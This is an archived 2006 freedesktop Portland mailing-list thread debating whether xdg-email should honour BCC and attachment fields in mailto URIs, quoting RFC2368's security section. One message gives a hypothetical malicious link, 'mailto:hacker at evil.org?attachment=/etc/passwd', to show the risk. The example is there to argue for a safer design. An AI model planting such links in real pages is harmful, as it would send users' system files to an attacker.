[Portland] RE: xdg-email BCC

Bryce Harrington bryce at osdl.org
Fri Jun 2 15:57:13 PDT 2006 

Well, the ability to do attachments would be one of the principle use
cases for applications using xdg.  Specifically, I'm thinking of
something like, File -> Mail-To, that would allow a user to email
whatever document they're working on to someone else.

Without an attachment capability, this would still be useful for
feedback links (maybe for sending in bug reports), but I think that's a
secondary use.

Anyway, so I think this distinguishes our usage from what this RFC is
targetting.  (I don't have an opinion on whether BCC would be useful to
include, but if we are supporting TO and CC, then why not?)

Bryce

On Fri, Jun 02, 2006 at 03:23:23PM -0700, Bastian, Waldo wrote:
> [CC'ing Portland list]
> 
> Well RFC2368 was written with the web in mind. Our use case here is slightly different, we want to give applications the possibility to invoke a mailer. The points made in the RFC remain valid though, so maybe we should offer explicit options for BCC and Attachment but not honour these options when they are part of the URL. Maybe we should go even further and offer all other options as an explicit command line options as well, which might be convenient in case you have the individual elements at hand but not a URL. What do other people think?
> 
> Waldo Bastian
> Linux Client Architect - Client Linux Foundation Technology
> Channel Platform Solutions Group
> Intel Corporation - http://www.intel.com/go/linux
> OSDL DTL Tech Board Chairman
> ________________________________________
> From: Whipple, Tom 
> Sent: Friday, June 02, 2006 3:03 PM
> To: Bastian, Waldo
> Subject: xdg-email BCC
> 
> >From the description in the xdg-email manpage:
> 
> "mailto-uri may contain ... bcc, subject, body and attachment."
> 
> However, from section 7 of RFC2368
> 
> ?? A mail client should never send anything without complete disclosure
> ?? to the user of what is will be sent; it should disclose not only the
> ?? message destination, but also any headers. Unrecognized headers, or
> ?? headers with values inconsistent with those the mail client would
> ?? normally send should be especially suspect. MIME headers (MIME-
> ?? Version, Content-*) are most likely inappropriate, as are those
> ?? relating to routing (From, Bcc, Apparently-To, etc.)
> 
> ?? Note that some headers are inherently unsafe to include in a message
> ?? generated from a URL. For example, headers such as "From:", "Bcc:",
> ?? and so on, should never be interpreted from a URL. In general, the
> ?? fewer headers interpreted from the URL, the less likely it is that a
> ?? sending agent will create an unsafe message.
> 
> So, I don't think Bcc should be mentioned in the manpage. But, this is a "should not" so I don't think we need to test to see that this is NOT supported.
> 
> Also, attachment is not mentioned in the RFC. I don't know if we want to think about it here and now, but what if I made a webpage with a link such as 'mailto:hacker at evil.org?attachment=/etc/passwd'. It seems that this would also be a security consideration.
> 
> -tom
> _______________________________________________
> Portland mailing list
> Portland at lists.freedesktop.org
> http://lists.freedesktop.org/mailman/listinfo/portland

More information about the Portland mailing list